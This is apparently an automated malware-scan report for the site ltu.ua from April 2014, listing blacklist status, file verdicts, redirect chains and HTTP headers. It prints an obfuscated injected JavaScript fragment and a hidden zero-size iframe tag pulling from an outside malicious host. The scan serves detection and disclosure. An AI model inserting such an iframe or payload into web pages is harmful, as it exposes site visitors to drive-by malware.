Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=ltu.ua
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://ltu.ua/ | 200 OK Content-Length: 51593 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) var lIO='=sTKpUGchN2cl9FKlBXYjNXZuVHKlRXaydnL05WZtV3YvR2OpETMw8FKkxWaoNEZuVGcwFmLPlUSKsTXwsVKnQWYlh2JoUWbh50ZhRVeCNHduVWblxWR0V2ZuQnbl1Wdj9GZg0DIPlUSgIXY2pwOpwkUV5CduVWb1N2bkhCduVmbvBXbvNUSSVVZk92YuV2Kn0DbyVnJnsSKyVmcyVmZlJnL05WZtV3YvRGK05WZu9Gct92QJJVVlR2bj5WZrcSPmVmcmcyKns2b9MmczRXZn9zLt92YuIXZsJWbhJ3Y0BXayN2chZXYq5SawF2LvoDc0RHanASPgMmcz5SMxAzXKsTKnQHcpJ3YzdCK05WZtVGbFVGdhVmcj5CduVWb1N2bkBSPgETMw8FIyFmd7cSRzUCdwlmcjN3LDNTJBBTJFNTJt0yLvEEMlQ0NlEEMlI0 ...[1339 bytes skipped]... Antivirus reports:
| ||
http://ltu.ua/engine/classes/js/jquery.js | 200 OK Content-Length: 91556 Content-Type: application/javascript | clean |
http://ltu.ua/engine/classes/js/jqueryui.js | 200 OK Content-Length: 65247 Content-Type: application/javascript | clean |
http://ltu.ua/engine/classes/js/dle_js.js | 200 OK Content-Length: 19675 Content-Type: application/javascript | clean |
http://ltu.ua/engine/classes/highslide/highslide.js | 200 OK Content-Length: 32993 Content-Type: application/javascript | clean |
http://ltu.ua/templates/Default/js/libs.js | 200 OK Content-Length: 1620 Content-Type: application/javascript | suspicious |
Hidden iFrame found. The same iFrame was found in 87 websites. size: 0x0 src: http://utkarshavidyalaya.org/css/css_old/bindex.php <iframe src="http://utkarshavidyalaya.org/css/css_old/bindex.php" width="0" height="0" frameborder="0"> | ||
http://www.5783483.ru/iframe.php | HTTP/1.1 200 OK Connection: close Date: Sun, 27 Apr 2014 10:55:20 GMT Server: nginx/1.6.0 Content-Type: text/html X-Powered-By: PHP/5.3.28 | clean |
http://mobuna.com/e/8419 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 27 Apr 2014 10:55:22 GMT Pragma: no-cache Location: http://liqe.net/l/Xx1NQbFtzZ54kcwyVGGtuQFTdUU Server: nginx Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: phpsid=jmsgq0lrvcfrsbokk74n3mkab4; path=/ X-Powered-By: PHP/5.3.10-1ubuntu3.4 | clean |
http://liqe.net/l/xx1nqbftzz54kcwyvggtuqftduu | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 27 Apr 2014 10:55:23 GMT Pragma: no-cache Location: /e/2 Server: nginx Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: phpsid=7e8cdo6ircmgugvdnldjpihtu0; path=/ X-Powered-By: PHP/5.3.10-1ubuntu3.4 | clean |
http://liqe.net/e/2 | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 27 Apr 2014 10:55:25 GMT Pragma: no-cache Location: http://liqe.net/l/69rCBIxIttoZrG0ho7xjU0PTp6T Server: nginx Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: phpsid=rm167pun04k6qdse5g373cgrt5; path=/ X-Powered-By: PHP/5.3.10-1ubuntu3.4 | clean |
http://liqe.net/l/69rcbixittozrg0ho7xju0ptp6t | HTTP/1.1 302 Found Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Connection: close Date: Sun, 27 Apr 2014 10:55:26 GMT Pragma: no-cache Location: /e/2 Server: nginx Content-Type: text/html; charset=utf-8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: phpsid=0u8b51scg0h8slb4q40fai7b30; path=/ X-Powered-By: PHP/5.3.10-1ubuntu3.4 | clean |
http://liqe.net/test404page.js | 404 Not Found Content-Length: 13 Content-Type: text/html | clean |
http://myinfos.com.ua/infob.php?i=26320 | 500 Can't connect to myinfos.com.ua:80 (Bad hostname) Content-Length: 160 Content-Type: text/plain | clean |
http://mirolend.h19.ru/styles.js | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://sem-dv.ru/jquery-update.php | 500 Can't connect to sem-dv.ru:80 (Bad hostname) Content-Length: 150 Content-Type: text/plain | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: ltu.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 27 Apr 2014 10:55:16 GMT
Pragma: no-cache
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_perl/2.0.6 Perl/v5.8.8
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=30aa7efc7734c5bd12a582bb416fd5bf; path=/
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ltu.ua; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ltu.ua; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ltu.ua; httponly
X-Powered-By: PHP/5.3.27
GET / HTTP/1.1
Host: ltu.ua
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Sun, 27 Apr 2014 10:55:16 GMT
Pragma: no-cache
Server: Apache/2.2.25 (Unix) mod_ssl/2.2.25 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 mod_perl/2.0.6 Perl/v5.8.8
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=30aa7efc7734c5bd12a582bb416fd5bf; path=/
Set-Cookie: dle_user_id=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ltu.ua; httponly
Set-Cookie: dle_password=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ltu.ua; httponly
Set-Cookie: dle_hash=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.ltu.ua; httponly
X-Powered-By: PHP/5.3.27
Second query (visit from search engine):
GET / HTTP/1.1
Host: ltu.ua
Referer: http://www.google.com/search?q=ltu.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: ltu.ua
Referer: http://www.google.com/search?q=ltu.ua
Result:
The result is similar to the first query. There are no suspicious redirects found.